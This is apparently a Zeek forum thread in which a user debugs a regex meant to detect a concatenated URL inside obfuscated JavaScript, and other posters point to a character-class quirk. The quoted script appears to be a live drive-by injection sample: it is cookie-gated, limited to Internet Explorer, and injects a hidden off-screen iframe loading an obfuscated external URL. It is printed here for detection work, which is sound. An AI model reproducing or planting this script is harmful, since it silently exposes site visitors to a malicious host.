Problems with Zeek regex - same pattern working on RegExr

Hi,

Been trying to get a piece of regex to work with Zeek for a couple of days, I am trying to extract the following string:

yDGNWQPxJVs=‘http:/’+’/bitmp’+‘3searc’+‘h.in/o’+‘5p9hd_’+‘j/Zl2A’+‘h0B35_’+‘D5FfDH’+‘INcy’;

From the following block of text:

jigsr=‘navigator’;coon3=‘document’;tiltu=window;prod8=tiltu[coon3];tensg=tiltu[jigsr];var wnd=window;yDGNWQPxJVs=‘http:/’+’/bitmp’+‘3searc’+‘h.in/o’+‘5p9hd_’+‘j/Zl2A’+‘h0B35_’+‘D5FfDH’+‘INcy’;var doc=wnd.document;OEkQahbGTK=yDGNWQPxJVs;function setCookie(name,value,expires){doc.cookie=name+’=’+escape(value)+"; expires="+expires.toGMTString()+"; path=/";return;}function getCookie(name){var cookie=’ ‘+doc.cookie;var search=’ ‘+name+’=’;var setStr=null;var offset = 0;var end = 0;if (cookie.length > 0) {offset = cookie.indexOf(search);if (offset != -1) {offset += search.length;end = cookie.indexOf(’;’, offset);if (end == -1) {end = cookie.length;}setStr = wnd.unescape(cookie.substring(offset, end));}}return setStr;}function UslhyuLiAkJ(){if(!getCookie(“BFQPubsjgY”)){var expires=new Date();expires.setTime(expires.getTime()+0x5265c00);setCookie(“BFQPubsjgY”,‘6efa5b267ee02fc3e86fc6422fd62e2b’,expires);return true}else{return false}}function AjheiSHvrOq(j7r){var w9,f5h,av,l1;l1=‘onload’;av=‘addEventListener’;f5h=‘attachEvent’;w9=‘DOMContentLoaded’;prod8[av]?prod8av:windowf5h}function jWpkbYMLKS(){var qy;qy=‘userAgent’;return tensg[qy]}function RTANcyPJq(y0l,np1){var p7;p7=‘test’;return y0lp7}function hDGVdQzyACP(){var fq;fq=jWpkbYMLKS();return RTANcyPJq(/Win64;/i,fq)||RTANcyPJq(/x64;/i,fq)}function XxIbmUNTRD(){var ai,be;be=(/Trident/i);ai=jWpkbYMLKS();if(!RTANcyPJq(be,ai)){return 0}else{return true}}function YSUTWLtuoX(){var jq6,u0u,l2,hn,r7c,qt7,y1,nmv,fa,bv,ag,cun,zu5,pqe;bv=‘posi’+‘tion:absolut’+‘e;left:-15’+‘23px;t’+‘op:-153’+‘7px’;nmv=‘src’;y1=‘iframe’;u0u=‘cssText’;l2=‘getElementsByTagName’;cun=‘body’;qt7=‘width’;fa=‘height’;pqe=‘appendChild’;hn=‘createElement’;r7c=‘style’;ag=‘10’;if(UslhyuLiAkJ()&&XxIbmUNTRD()&&!hDGVdQzyACP()){jq6=ag;zu5=prod8hn;zu5[qt7]=jq6;zu5[fa]=jq6;zu5[r7c][u0u]=bv;zu5[nmv]=OEkQahbGTK;prod8l2[0]pqe}}AjheiSHvrOq(YSUTWLtuoX);

On https://regexr.com/ I use the regex:

[\d\w]+[\s]=[\s]((’([:/._-]|[\d\w]|[\s])+’)+([\s]|+)+)+(’([:/._-]|[\d\w]|[\s])+’)+;?

This correctly identifies the string. I’m now trying to get this same regex pattern to work in zeek, I converted the syntax as follows:

local concat = find_all(data, /[:alnum:]+[:space:]=[:space:]((’([:/._-]|[:alnum:]|[:space:])+’)+([:space:]|+)+)+(’([:/._-]|[:alnum:]|[:space:])+’)+;?/i);

Unfortunately, this is not matching and I can’t understand why not. Logically, it is exactly the same as the regex pattern I’ve tested on RegExr.

It’s a long shot but if anyone can spot what I’m doing wrong, please let me know :blush:

Thanks,

Jonah

Hi,

I fixed this – for some reason [:alnum:] is not treated the same as [a-z0-9]

Thanks,

Jonah

Odd. [:alnum:] calls the C isalnum() method underneath, which should check [a-zA-Z0-9]. Can you write up a GitHub issue for it with a simple test case?

Tim